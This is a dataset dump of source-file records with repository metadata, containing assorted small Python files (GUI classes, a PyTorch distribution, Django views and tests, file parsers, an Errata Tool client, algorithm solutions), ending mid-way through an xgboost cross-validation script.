blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c98bf9af78911012a5d580d8fab568dc0dd4d262
|
5aa0e5f32d529c3321c28d37b0a12a8cf69cfea8
|
/client/gui_lib/GUIElement.py
|
9e1b3576bea5c0ed0b0177d38d061da26e549710
|
[] |
no_license
|
sheepsy90/survive
|
26495f1ff2d8247fbb9470882f8be9f5272e7f2c
|
0eddf637be0eacd34415761b78fc2c9d50bc1528
|
refs/heads/master
| 2021-01-09T05:55:16.546762 | 2017-02-03T20:15:28 | 2017-02-03T20:15:28 | 80,864,391 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,463 |
py
|
import pygame
class GUIElement(object):
TEXT = 2
BUTTON = 1
def __init__(self, name, rect):
self.name = name
self.x, self.y, self.width, self.height = rect
self.is_hover = False
self.gui_handler = None
self.focus = False
self.visible = True
self.z_order = 0
self.titleFont = pygame.font.Font('resources/fonts/VENUSRIS.ttf', 64)
def set_zorder(self, order):
self.z_order = order
def get_zorder(self):
return self.z_order
def get_name(self):
return self.name
def set_hover_state(self, mx, my):
if self.x <= mx <= self.width+self.x and self.y <= my <= self.height+self.y:
self.is_hover = True
else:
self.is_hover = False
def update(self, mx, my, mouse_buttons, events):
self.set_hover_state(mx, my)
def get_rect(self):
return pygame.Rect(self.x, self.y, self.width, self.height)
def is_hover_active(self):
return self.is_hover
def draw(self, renderer):
raise NotImplementedError
def register_gui_handler(self, gui_handler):
self.gui_handler = gui_handler
def enable_focus(self):
self.focus = True
def disable_focus(self):
self.focus = False
def has_focus(self):
return self.focus
def set_visible(self, value):
self.visible = value
def is_visible(self):
return self.visible
|
[
"[email protected]"
] | |
8bab37daf96d71aa280e74d681d7515f1291bf03
|
c9f67529e10eb85195126cfa9ada2e80a834d373
|
/lib/python3.5/site-packages/torch/distributions/geometric.py
|
1e4b121cd7b4cfcccd548bf86ff634e3392b7ebe
|
[
"Apache-2.0"
] |
permissive
|
chilung/dllab-5-1-ngraph
|
10d6df73ea421bfaf998e73e514972d0cbe5be13
|
2af28db42d9dc2586396b6f38d02977cac0902a6
|
refs/heads/master
| 2022-12-17T19:14:46.848661 | 2019-01-14T12:27:07 | 2019-01-14T12:27:07 | 165,513,937 | 0 | 1 |
Apache-2.0
| 2022-12-08T04:59:31 | 2019-01-13T14:19:16 |
Python
|
UTF-8
|
Python
| false | false | 2,923 |
py
|
from numbers import Number
import torch
from torch.distributions import constraints
from torch.distributions.distribution import Distribution
from torch.distributions.utils import broadcast_all, probs_to_logits, logits_to_probs, lazy_property, _finfo
from torch.nn.functional import binary_cross_entropy_with_logits
class Geometric(Distribution):
r"""
Creates a Geometric distribution parameterized by `probs`, where `probs` is the probability of success of Bernoulli
trials. It represents the probability that in k + 1 Bernoulli trials, the first k trials failed, before
seeing a success.
Samples are non-negative integers [0, inf).
Example::
>>> m = Geometric(torch.tensor([0.3]))
>>> m.sample() # underlying Bernoulli has 30% chance 1; 70% chance 0
2
[torch.FloatTensor of size 1]
Args:
probs (Number, Tensor): the probabilty of sampling `1`. Must be in range (0, 1]
logits (Number, Tensor): the log-odds of sampling `1`.
"""
arg_constraints = {'probs': constraints.unit_interval}
support = constraints.nonnegative_integer
def __init__(self, probs=None, logits=None, validate_args=None):
if (probs is None) == (logits is None):
raise ValueError("Either `probs` or `logits` must be specified, but not both.")
if probs is not None:
self.probs, = broadcast_all(probs)
if not self.probs.gt(0).all():
raise ValueError('All elements of probs must be greater than 0')
else:
self.logits, = broadcast_all(logits)
probs_or_logits = probs if probs is not None else logits
if isinstance(probs_or_logits, Number):
batch_shape = torch.Size()
else:
batch_shape = probs_or_logits.size()
super(Geometric, self).__init__(batch_shape, validate_args=validate_args)
@property
def mean(self):
return 1. / self.probs - 1.
@property
def variance(self):
return (1. / self.probs - 1.) / self.probs
@lazy_property
def logits(self):
return probs_to_logits(self.probs, is_binary=True)
@lazy_property
def probs(self):
return logits_to_probs(self.logits, is_binary=True)
def sample(self, sample_shape=torch.Size()):
shape = self._extended_shape(sample_shape)
with torch.no_grad():
u = self.probs.new(shape).uniform_(_finfo(self.probs).tiny, 1)
return (u.log() / (-self.probs).log1p()).floor()
def log_prob(self, value):
if self._validate_args:
self._validate_sample(value)
value, probs = broadcast_all(value, self.probs.clone())
probs[(probs == 1) & (value == 0)] = 0
return value * (-probs).log1p() + self.probs.log()
def entropy(self):
return binary_cross_entropy_with_logits(self.logits, self.probs, reduce=False) / self.probs
|
[
"[email protected]"
] | |
3387a7b1ab5c092a4be3f73958c4f37a2aec6a5c
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02683/s728076842.py
|
530d406c4a8a8bf681c980d60d4d26bc44d72770
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 390 |
py
|
import numpy as np
n,m,x=map(int,input().split())
a=2**64
b=[np.array(list(map(int,input().split())),"i8")for i in range(n)]
for i in range(2**n):
c=bin(i)[2:]
c="0"*(n-len(c))+c
l=np.zeros(m)
q=0
for j in range(n):
if c[j]=="1":
q+=b[j][0]
l+=b[j][1:]
if np.min(l)>=x:
a=min(a,q)
if a==2**64:
print(-1)
else:
print(a)
|
[
"[email protected]"
] | |
6aaba7d662a21da85d2ba3e6b178f7ecf8d58cd2
|
e7b07f173a8bc0d36e046c15df7bbe3d18d49a33
|
/parse.py
|
9d1894ef9159fb1b51738dbba15b24d5bcb61bc0
|
[] |
no_license
|
jcarbaugh/makeitwrk
|
82b6e8079b118e8d668b2e6858096a54da33d5a8
|
83801b19c120b4cf728b8342c4933fefe54b54d8
|
refs/heads/master
| 2020-04-06T04:55:56.785930 | 2011-08-26T19:09:27 | 2011-08-26T19:09:27 | 2,275,931 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,029 |
py
|
#!/usr/bin/env python
from struct import pack, unpack
import sys
CHUNK_TYPES = {
1: 'TRACK_CHUNK',
2: 'STREAM_CHUNK',
4: 'METER_CHUNK',
5: 'TEMPO_CHUNK',
6: 'SYSEX_CHUNK',
7: 'MEMRGN_CHUNK',
10: 'TIMEBASE_CHUNK',
# variables
3: 'VARS_CHUNK',
26: 'VARS_CHUNK_VAR',
# device stuff
33: 'DEVICES',
# track stuff?
36: 'TRACK_NAME?',
54: 'TRACK_PORT',
45: 'TRACK_DATA?',
255: 'END_CHUNK',
}
def solomon(arr, parts):
for i in range(0, parts * 8, 8):
yield arr[i:i+8]
def chunk_reader(wrkfile):
if wrkfile.read(8) != b'CAKEWALK':
raise ValueError('invalid file format')
wrkfile.read(1) # byte I don't care about
mm_version = wrkfile.read(2)
major = ord(mm_version[1])
minor = ord(mm_version[0])
version = "%i.%i" % (major, minor)
yield ('VERSION_CHUNK', 2, None, version)
while 1:
ch_type_data = wrkfile.read(1)[0]
ch_type = CHUNK_TYPES.get(ch_type_data, ch_type_data)
if ch_type == 'END_CHUNK':
break
ch_len = unpack('i', wrkfile.read(4))[0]
ch_data_offset = wrkfile.tell()
#print(ch_data_offset)
ch_data = wrkfile.read(ch_len)
yield (ch_type, ch_len, ch_data)
yield ('END_CHUNK', None, None, None)
wrkfile.close()
if __name__ == '__main__':
for chunk in chunk_reader(sys.stdin):
print(chunk)
# if chunk[0] == 'TRACK_NAME?':
# (tnum, tname_len) = unpack('HB', chunk[2][:3])
# tname = chunk[2][3:3+tname_len].decode('utf-8')
# print("[%02i] %s" % (tnum, tname))
# elif chunk[0] == 'TRACK_DATA?':
# (tnum, schunks) = unpack('=HxH', chunk[2][:5])
# print(' ', '------------')
# for s in solomon(chunk[2][7:], schunks):
# print(' ', unpack('8B', s))
"""
__TRACK_DATA__
#2 ?? CNT- ???? 16---------------
0900 00 0700 0000 B649 009023641E00 D449 009028643C00 104A 00902B643C00 4C4A 009029643C00 884A 009023641E00 A64A 009023641E00 E24A 009023641E00
0900 00 0700 0000 1E4B 009023641E00 3C4B 009028643C00 784B 00902B643C00 B44B 009029643C00 F04B 009023641E00 0E4C 009023641E00 4A4C 009023641E00
(30, 75, 0, 144, 35, 100, 30, 0)
submeasure . . . .
measure. . . .
? . . . .
? . . .
nt? . .
? .
-----?
------------------------------------
0000 00 0800 0000 E010 009045643C00 1C11 009045643C00 5811 00904C643C00 9411 009045643C00 D011 00904D643C00 0C12 00904C643C00 4812 009048643C00 8412 009045643C00
0200 00 1400 0000 8016 00902664E001 3417 009026643C00 7017 009026647800 E817 009026647800 2418 009026643C00 6018 00902264E001 1419 009022643C00 5019 009022647800 C819 009022647800041A009022643C00401A00901F64E001F41A00901F643C00301B00901F647800A81B00901F647800E41B00901F643C00201C00902164E001D41C009021643C00101D009021647800881D009021647800C41D009021643C00
__TRACK_NAME__
#2 L2 NAME* INSTRUMENT?
0000 05 4F7267616E FFFF 1500 FFFFFFFF 00000000000000 0A 0000000000
O R G A N
0100 0B 536C617020426173732031 FFFF 2500 FFFFFFFF 00000000000000 0A 0000010000
S L A P B A S S 1
0200 0B 536C617020426173732032 FFFF 2400 FFFFFFFF 00000000000000 FE 0000020000
S L A P B A S S 2
0300 0C 4869676820537472696E6773 FFFF 2C00 FFFFFFFF 00000000000000 0A 0000030000
H I G H S T R I N G S
0900 05 4472756D73 FFFF FFFF FFFFFFFF 00000000000000 0A 0000090000
D R U M S
-------------------------------------------
0000 05 4472756D73 FFFF FFFF FFFFFFFF 00000000000000 0A 0000090000
D R U M S
"""
|
[
"[email protected]"
] | |
602bf5ff185fae424574e01f0d60bafdc9fad426
|
9d032e9864ebda8351e98ee7950c34ce5168b3b6
|
/301.py
|
10f8978082ea2c4ee7bbac60f631a00e920d68cf
|
[] |
no_license
|
snpushpi/P_solving
|
e0daa4809c2a3612ba14d7bff49befa7e0fe252b
|
9980f32878a50c6838613d71a8ee02f492c2ce2c
|
refs/heads/master
| 2022-11-30T15:09:47.890519 | 2020-08-16T02:32:49 | 2020-08-16T02:32:49 | 275,273,765 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,269 |
py
|
'''
Remove the minimum number of invalid parentheses in order to make the input string valid. Return all possible results.
Note: The input string may contain letters other than the parentheses ( and ).
Example 1:
Input: "()())()"
Output: ["()()()", "(())()"]
Example 2:
Input: "(a)())()"
Output: ["(a)()()", "(a())()"]
Example 3:
Input: ")("
Output: [""]
'''
def validstring(string):
count = 0
for char in string:
if char=='(':
count+=1
elif char==')':
count-=1
if count<0:
return False
return (count==0)
def main(input_string):
l = len(input_string)
queue = [input_string]
visited = set()
visited.add(input_string)
level = False
result = []
while queue:
new_str = queue.pop(0)
if validstring(new_str):
result.append(new_str)
level= True
if level:
continue
for i in range(len(new_str)):
if not (new_str[i]==')' or new_str[i]=='('):
continue
part_string = new_str[:i]+new_str[i+1:]
if part_string not in visited:
visited.add(part_string)
queue.append(part_string)
return result
print(main("()())()"))
|
[
"[email protected]"
] | |
0285e95057b21742ade89d9041421eb988eb90fb
|
d79c152d072edd6631e22f886c8beaafe45aab04
|
/nicolock/products/rest_urls.py
|
d58d9a92a31372b447067ee3dd7508ef1d810182
|
[] |
no_license
|
kabroncelli/Nicolock
|
764364de8aa146721b2678c14be808a452d7a363
|
4c4343a9117b7eba8cf1daf7241de549b9a1be3b
|
refs/heads/master
| 2020-03-11T11:02:43.074373 | 2018-04-18T17:38:33 | 2018-04-18T17:38:33 | 129,959,455 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 690 |
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.conf.urls import url
from . import rest_views as views
urlpatterns = [
url(
regex=r'^products/(?P<pk>\d+)/$',
view=views.ProductDetail.as_view(),
name='product-detail'
),
url(
regex=r'^products/(?P<pk>\d+)/like/$',
view=views.ProductLike.as_view(),
name='product-like'
),
url(
regex=r'^categories/$',
view=views.CategoryList.as_view(),
name='category-list'
),
url(
regex=r'^categories/(?P<pk>\d+)/$',
view=views.CategoryDetail.as_view(),
name='category-detail'
),
]
|
[
"[email protected]"
] | |
d3527c75633bd397f54893cab6262bed50e53879
|
d17d65a3ee48b307a46a0b95a05f04131668edbe
|
/TestSuite/runner.py
|
6a172fc2702d50f5b6f0558a2beab1d4f677a319
|
[] |
no_license
|
qlcfj001/ui_test
|
28fa370a6f912b2ff9a551c681d35a452c57ee02
|
25020af19d84c9c2b1bad02aca89cc881e828bbb
|
refs/heads/master
| 2023-06-15T18:10:02.177702 | 2021-07-15T06:35:10 | 2021-07-15T06:35:10 | 386,012,875 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 376 |
py
|
from Page.Base import base
from pageobjct.SearcH import Searchpage
from selenium.webdriver.common.by import By
#from TestSuite.Variablelayer.Variable import *
import time
import unittest
leave='成都'
leave_data="2021-07-20"
arrive='北京'
arrive_data='2021-07-30'
aa=Searchpage()
aa.search7(leave='成都',leave_data="2021-07-20",arrive='北京',arrive_data='2021-07-30')
|
[
"[email protected]"
] | |
06d3b8b17c46a0ae3faf7387123f73c73bea8d78
|
4766d241bbc736e070f79a6ae6a919a8b8bb442d
|
/20200215Python-China/0094. Binary Tree Inorder Traversal.py
|
08893a77b8777c433e17edf90f755b8b4b58c958
|
[] |
no_license
|
yangzongwu/leetcode
|
f7a747668b0b5606050e8a8778cc25902dd9509b
|
01f2edd79a1e922bfefecad69e5f2e1ff3a479e5
|
refs/heads/master
| 2021-07-08T06:45:16.218954 | 2020-07-18T10:20:24 | 2020-07-18T10:20:24 | 165,957,437 | 10 | 8 | null | null | null | null |
UTF-8
|
Python
| false | false | 733 |
py
|
'''
Given a binary tree, return the inorder traversal of its nodes' values.
Example:
Input: [1,null,2,3]
1
\
2
/
3
Output: [1,3,2]
Follow up: Recursive solution is trivial, could you do it iteratively?
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def inorderTraversal(self, root: TreeNode) -> List[int]:
rep=[]
self.getInOrderTra(root,rep)
return rep
def getInOrderTra(self,root,rep):
if not root:
return
self.getInOrderTra(root.left,rep)
rep.append(root.val)
self.getInOrderTra(root.right,rep)
|
[
"[email protected]"
] | |
552fea4e7e4a404550ffa6236bc4c30f22f33e18
|
3f9f7c73bb2f9da31c586d2b64e2cc94f35239dc
|
/django-polls/polls/tests/test_models.py
|
94b7c24fbee98fcaf5c51ee69dd5ad670600b45b
|
[
"MIT"
] |
permissive
|
jsterling23/DPY_Refresher
|
eb57e37d4bbad14143800719668b990b459fb56d
|
4646b7ebd79ba853f5ccc172183f41257cc12b60
|
refs/heads/master
| 2020-03-23T19:11:32.626731 | 2018-07-29T01:17:49 | 2018-07-29T01:17:49 | 141,959,227 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,141 |
py
|
from django.test import TestCase
import datetime
from django.utils import timezone
from ..models import Question
from django.urls import reverse
class QuestionModelTests(TestCase):
def test_was_published_recently_with_future_question(self):
# method should return false for future dated questions.
time = timezone.now() + datetime.timedelta(days=1, seconds=1)
future_question = Question(pub_date=time)
self.assertIs(future_question.was_published_recently(), False)
def test_was_published_recently_with_past_question(self):
# method should return false for past dated questions.
time = timezone.now() - datetime.timedelta(days=1, seconds=1)
past_question = Question(pub_date=time)
self.assertIs(past_question.was_published_recently(), False)
def test_was_published_recently_with_current_question(self):
# should return True for current question
time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)
current_question = Question(pub_date=time)
self.assertIs(current_question.was_published_recently(), True)
|
[
"[email protected]"
] | |
e5fefc6b8e0ec0d00e467d6808038193d92e8aa7
|
683b73e0c95c755a08e019529aed3ff1a8eb30f8
|
/machina/apps/forum_moderation/__init__.py
|
f1911a14dbd6195e896b647fa949fa08a0c6abce
|
[
"BSD-3-Clause"
] |
permissive
|
DrJackilD/django-machina
|
b3a7be9da22afd457162e0f5a147a7ed5802ade4
|
76858921f2cd247f3c1faf4dc0d9a85ea99be3e1
|
refs/heads/master
| 2020-12-26T08:19:09.838794 | 2016-03-11T03:55:25 | 2016-03-11T03:55:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 217 |
py
|
# -*- coding: utf-8 -*-
# Standard library imports
# Third party imports
# Local application / specific library imports
default_app_config = 'machina.apps.forum_moderation.registry_config.ModerationRegistryConfig'
|
[
"[email protected]"
] | |
c7ebc6f32e1358ed20f23dc25b3df7d6a66daf88
|
4aeaca4c58858125e844aad1cd988182201b5120
|
/crane/files/timeHistoryParser.py
|
be957dd91e6668776b4c071a376eeffa2a646763
|
[] |
no_license
|
tkarna/crane
|
f18442a010af0909b7f5af9358cf9080ca1dd1e4
|
b8313d0373d8206685d81aadccc425e432c6a010
|
refs/heads/master
| 2020-05-21T23:39:07.707777 | 2017-11-16T15:58:14 | 2017-11-16T15:58:14 | 53,163,424 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,357 |
py
|
"""
Read SELFE time history (.th) files to a data container.
Jesse Lopez - 2016-04-15
"""
import datetime
import argparse
import numpy as np
from crane.data import timeArray
from crane.data import dataContainer
class thParser(object):
def __init__(self, filename, start_time):
self.filename = filename
self.start_date = start_time
self.time = None
self.data = None
def readFile(self):
"""Read time history file."""
th = np.loadtxt(self.filename)
self.time = timeArray.simulationToEpochTime(th[:, 0], self.start_date)
self.data = th[:, 1]
def genDataContainer(self, variable='variable', station='bvao',
depth='0', bracket='A', save=False):
"""Generate data container."""
x = y = z = 0
coordSys = ''
meta = {}
meta['tag'] = 'timeHistory'
meta['variable'] = variable
meta['location'] = station
meta['msldepth'] = depth
meta['bracket'] = bracket
dc = dataContainer.dataContainer.fromTimeSeries(
self.time, self.data, fieldNames=[variable],
x=x, y=y, z=z, timeFormat='epoch', coordSys=coordSys,
metaData=meta)
if save:
fname = './'+station+'_'+variable+'_'+'0'+'_'+self.start_date.strftime('%Y-%m-%d')+'.nc'
print fname
dc.saveAsNetCDF(fname)
return dc
def parseCommandLine():
parser = argparse.ArgumentParser(description='Read time history to dataContainer.')
parser.add_argument('filepath', type=str, help='Path to time history file.')
parser.add_argument('starttime', type=str, help='Start time of simulation YYYY-MM-DD')
parser.add_argument('variable', type=str, help='Variable name (e.g. - salinity, temp, turbidity)')
parser.add_argument('station', type=str, help='Station name (e.g. - saturn01, tpoin)')
parser.add_argument('depth', type=str, help='Station depth (e.g. - 0.1, 4.0)')
parser.add_argument('bracket', type=str, help='Bracket (e.g. - F, A, R)')
args = parser.parse_args()
st = datetime.datetime.strptime(args.starttime, '%Y-%m-%d')
th = thParser(args.filepath, st)
th.readFile()
th.genDataContainer(args.variable, args.station, args.depth, args.bracket, True)
if __name__ == '__main__':
parseCommandLine()
|
[
"[email protected]"
] | |
075c8636339cb3b08aa5c4c3815994408a005e38
|
853d7bd91f4ba254fba0ff28f2e0a3eb2b74fa48
|
/errata_tool/release.py
|
b5c1211cb9a8c86556c758725ad9297bc11a9fbb
|
[
"MIT"
] |
permissive
|
smunilla/errata-tool
|
b07614daeceda4a1bfc18ce59679be0a93bb084f
|
91bdfb17f15308b46298210fbb2fe5af786276bc
|
refs/heads/master
| 2020-04-10T00:18:12.471123 | 2018-11-19T17:33:02 | 2018-11-28T15:40:08 | 160,681,680 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,800 |
py
|
from __future__ import print_function
import sys
from datetime import date
from errata_tool import ErrataConnector
from errata_tool.product import Product
from errata_tool.product_version import ProductVersion
from errata_tool.user import User
class NoReleaseFoundError(Exception):
pass
class MultipleReleasesFoundError(Exception):
pass
class ReleaseCreationError(Exception):
pass
class Release(ErrataConnector):
def __init__(self, **kwargs):
if 'id' not in kwargs and 'name' not in kwargs:
raise ValueError('missing release "id" or "name" kwarg')
self.id = kwargs.get('id')
self.name = kwargs.get('name')
self.refresh()
def refresh(self):
url = self._url + '/api/v1/releases?'
if self.id is not None:
url += 'filter[id]=%s' % self.id
elif self.name is not None:
url += 'filter[name]=%s' % self.name
result = self._get(url)
if len(result['data']) < 1:
raise NoReleaseFoundError()
if len(result['data']) > 1:
# it's possible to accidentally have identically named releases,
# see engineering RT 461783
raise MultipleReleasesFoundError()
self.data = result['data'][0]
self.id = self.data['id']
self.name = self.data['attributes']['name']
self.description = self.data['attributes']['description']
self.type = self.data['attributes']['type']
self.is_active = self.data['attributes']['is_active']
self.enabled = self.data['attributes']['enabled']
self.blocker_flags = self.data['attributes']['blocker_flags']
self.is_pdc = self.data['attributes']['is_pdc']
self.product_versions = self.data['relationships']['product_versions']
self.url = self._url + '/release/show/%d' % self.id
# For displaying in scripts/logs:
self.edit_url = self._url + '/release/edit/%d' % self.id
def advisories(self):
"""
Find all advisories for this release.
:returns: a list of dicts, one per advisory.
For example:
[{
"id": 32972,
"advisory_name": "RHSA-2018:0546",
"product": "Red Hat Ceph Storage",
"release": "rhceph-3.0",
"synopsis": "Important: ceph security update",
"release_date": None,
"qe_owner": "[email protected]",
"qe_group": "RHC (Ceph) QE",
"status": "SHIPPED_LIVE",
"status_time": "March 15, 2018 18:29"
}]
"""
url = '/release/%d/advisories.json' % self.id
return self._get(url)
@classmethod
def create(klass, name, product, product_versions, type, program_manager,
default_brew_tag, blocker_flags, ship_date=None):
"""
Create a new release in the ET.
See https://bugzilla.redhat.com/1401608 for background.
Note this method enforces certain conventions:
* Always disables PDC for a release
* Always creates the releases as "enabled"
* Always allows multiple advisories per package
* Description is always the combination of the product's own
description (for example "Red Hat Ceph Storage") with the number
from the latter part of the release's name. So a new "rhceph-3.0"
release will have a description "Red Hat Ceph Storage 3.0".
:param name: short name for this release, eg "rhceph-3.0"
:param product: short name, eg. "RHCEPH".
:param product_versions: list of names, eg. ["RHEL-7-CEPH-3"]
:param type: "Zstream" or "QuarterlyUpdate"
:param program_manager: for example "anharris" (Drew Harris, Ceph PgM)
:param default_brew_tag: for example "ceph-3.0-rhel-7-candidate"
:param blocker_flags: for example, "ceph-3.0"
:param ship_date: date formatted as strftime("%Y-%b-%d"). For example,
"2017-Nov-17". If ommitted, the ship_date will
be set to today's date. (This can always be updated
later to match the ship date value in Product
Pages.)
"""
product = Product(product)
(_, number) = name.split('-', 1)
description = '%s %s' % (product.description, number)
program_manager = User(program_manager)
product_version_ids = set([])
for pv_name in product_versions:
pv = ProductVersion(pv_name)
product_version_ids.add(pv.id)
if ship_date is None:
today = date.today()
ship_date = today.strftime("%Y-%b-%d")
et = ErrataConnector()
url = et._url + '/release/create'
payload = {
'type': type,
'release[allow_blocker]': 0,
'release[allow_exception]': 0,
'release[allow_pkg_dupes]': 1,
'release[allow_shadow]': 0,
'release[blocker_flags]': blocker_flags,
'release[default_brew_tag]': default_brew_tag,
'release[description]': description,
'release[enable_batching]': 0,
'release[enabled]': 1,
'release[is_deferred]': 0,
'release[is_pdc]': 0,
'release[name]': name,
'release[product_id]': product.id,
'release[product_version_ids][]': product_version_ids,
'release[program_manager_id]': program_manager.id,
'release[ship_date]': ship_date,
'release[type]': type,
}
result = et._post(url, data=payload)
if (sys.version_info > (3, 0)):
body = result.text
else:
# Found during live testing:
# UnicodeEncodeError: 'ascii' codec can't encode character u'\xe1'
# in position 44306: ordinal not in range(128)
# Not sure why there was a non-ascii character in the ET's HTTP
# response, but this fixes it.
body = result.text.encode('utf-8')
if result.status_code != 200:
# help with debugging:
print(body)
result.raise_for_status()
# We can get a 200 HTTP status_code here even when the POST failed to
# create the release in the ET database. (This happens, for example, if
# there are no Approved Components defined in Bugzilla for the release
# flag, and the ET hits Bugzilla's XMLRPC::FaultException.)
if 'field_errors' in body:
print(body)
raise ReleaseCreationError('see field_errors <div>')
return klass(name=name)
|
[
"[email protected]"
] | |
b9470a6364fcb617b3b2bbeb23ef97dce22221d7
|
de6fb3a55196b6bd36a4fda0e08ad658679fb7a1
|
/optin_manager/src/python/openflow/common/utils/formfields.py
|
adec249dc39015d89a6d299354718c9fd0f8e896
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
dana-i2cat/felix
|
4a87af639e4c7db686bfa03f1ae4ce62711615e3
|
059ed2b3308bda2af5e1942dc9967e6573dd6a53
|
refs/heads/master
| 2021-01-02T23:12:43.840754 | 2016-02-04T10:04:24 | 2016-02-04T10:04:24 | 17,132,912 | 4 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 388 |
py
|
'''
Created on Jul 17, 2010
@author: jnaous
'''
from django import forms
from expedient.common.utils import validators
class MACAddressField(forms.CharField):
"""
A MAC Address form field.
"""
default_error_messages = {
'invalid': u'Enter a valid MAC address in "xx:xx:xx:xx:xx:xx" format.',
}
default_validators = [validators.validate_mac_address]
|
[
"[email protected]"
] | |
22214c4cf02d9139ebf68302682f68b55190d51e
|
3a7adfdcf7a5048045c8e95a93369a1796cfd532
|
/conftest.py
|
377ddc7028f2964dd5cf5621a68dc74e7967e513
|
[
"BSD-3-Clause"
] |
permissive
|
theGreenJedi/nixpy
|
e06025077d5d224a7d051532ebfbd48845339c58
|
40b5ecdaa9b074c7bf73137d1a94cb84fcbae5be
|
refs/heads/master
| 2022-02-01T15:14:22.133157 | 2019-06-03T09:10:57 | 2019-06-03T09:10:57 | 197,896,640 | 1 | 0 | null | 2019-07-20T07:37:03 | 2019-07-20T07:37:02 | null |
UTF-8
|
Python
| false | false | 808 |
py
|
import pytest
import tempfile
from nixio.test.xcompat.compile import maketests
BINDIR = tempfile.mkdtemp(prefix="nixpy-tests-")
def pytest_addoption(parser):
parser.addoption("--nix-compat", action="store_true", default=False,
help=("Run nix compatibility tests "
"(requires NIX library)"))
@pytest.fixture
def bindir(request):
return BINDIR
def pytest_collection_modifyitems(config, items):
if config.getoption("--nix-compat"):
print("Compiling NIX compatibility tests")
maketests(BINDIR)
return
skip_compat = pytest.mark.skip(
reason="Use --nix-compat option to run compatibility tests"
)
for item in items:
if "compatibility" in item.keywords:
item.add_marker(skip_compat)
|
[
"[email protected]"
] | |
6a337ebcad790f7341970c4a3e71d1686f6229c6
|
333b405c1775475ddfa9ed3f4fa05c06b4c2e3f2
|
/cv2/cvbackup/mycv_0.510464.py
|
c1b80110eb76fc4413a5cbbc9977af4cd86de47d
|
[] |
no_license
|
daxiongshu/network
|
b77d5bb73dd353537f7687e61855d982cbd34464
|
842a778d310410ae39e58925257a9e9960ef560a
|
refs/heads/master
| 2020-04-15T16:11:31.101188 | 2016-02-16T01:32:21 | 2016-02-16T01:32:21 | 51,798,576 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,405 |
py
|
from xgb_classifier import xgb_classifier
import pandas as pd
import numpy as np
import pickle
from sklearn.ensemble import AdaBoostClassifier,ExtraTreesClassifier,RandomForestRegressor
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import roc_auc_score, f1_score, log_loss, make_scorer
from sklearn.linear_model import SGDClassifier
from sklearn.svm import LinearSVC,SVC
from sklearn.cross_validation import cross_val_score, train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.cross_validation import train_test_split,KFold,StratifiedKFold
from math import log, exp, sqrt,factorial
import numpy as np
from scipy import sparse
from sklearn.ensemble import RandomForestRegressor
from sklearn.externals.joblib import Memory
from sklearn.datasets import load_svmlight_file
def rmsle(y,yp):
return (np.mean((yp-y)**2))**0.5
def multiclass_log_loss(y_true, y_pred, eps=1e-15):
predictions = np.clip(y_pred, eps, 1 - eps)
# normalize row sums to 1
predictions /= predictions.sum(axis=1)[:, np.newaxis]
actual = np.zeros(y_pred.shape)
n_samples = actual.shape[0]
#y_true-=1
actual[np.arange(n_samples), y_true.astype(int)] = 1
vectsum = np.sum(actual * np.log(predictions))
loss = -1.0 / n_samples * vectsum
return loss
def new_clf_train_predict(X,y,Xt):
clf=single_model()
clf.fit(X,y)
return clf.predict_proba(Xt)
def cut(yp):
yp[yp<0]=0
yp[yp>7]=7
yp=yp.astype(int)
return yp
def kfold_cv(X_train, y_train,k):
kf = StratifiedKFold(y_train,n_folds=k)
xx=[]
zz=[]
ypred=np.zeros((y_train.shape[0],3))
for train_index, test_index in kf:
X_train_cv, X_test_cv = X_train[train_index,:],X_train[test_index,:]
y_train_cv, y_test_cv = y_train[train_index],y_train[test_index]
clf=xgb_classifier(eta=0.1,gamma=0,col=0.4,min_child_weight=1,depth=7,num_round=160)
